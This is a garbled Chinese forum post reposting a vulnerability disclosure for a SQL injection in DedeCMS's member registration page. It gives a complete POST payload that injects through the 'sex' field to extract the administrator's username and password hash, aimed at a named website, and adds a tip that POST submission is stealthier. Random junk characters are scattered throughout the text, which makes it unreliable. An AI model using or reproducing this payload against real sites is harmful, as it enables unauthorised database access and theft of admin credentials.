漏洞类型: SQL注射漏洞
$ \; y( v) e3 f简要描述:. Z; X- E0 i; I' P& ^
! V+ P! ]9 g1 |/ q: J3 V" U1 T
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.& N1 I% ?+ C1 i% x: `
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.- t, [4 X$ b* n# o! |7 T
详细说明:跟这个漏洞
1 B: O5 L9 ?/ w+ B9 f6 y : M$ C7 A7 ]% [; N0 ~6 O0 s8 p
WooYun: Dedecms SQL注射导致审核机制绕过漏洞. S0 C! d7 s2 R# h. }
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
# b2 J3 S) w! k7 u3 F! i8 w# EPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
( s. M+ F9 o, J# E
. ]( W* @1 P) r5 Uwww.political-security.com/member/reg_new.php& w8 t1 b1 j3 D! E8 c: V
; y6 a0 ~3 R0 B& S( ~6 S+ o' EPOST7 ?) R; |2 W" \. y
l; B1 w& W9 t, c- Z( C. \
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
- E. j; p$ R1 muserid=c4rp3nt3r&uname=c4rp3nt3r
# A$ x4 V% U, ]0 ^&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss: }9 ~( j8 I9 v: k
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
/ c$ m# _) Y, i0 ]$ s(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');2 O% ?) S( r( _/ U; E2 T
%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对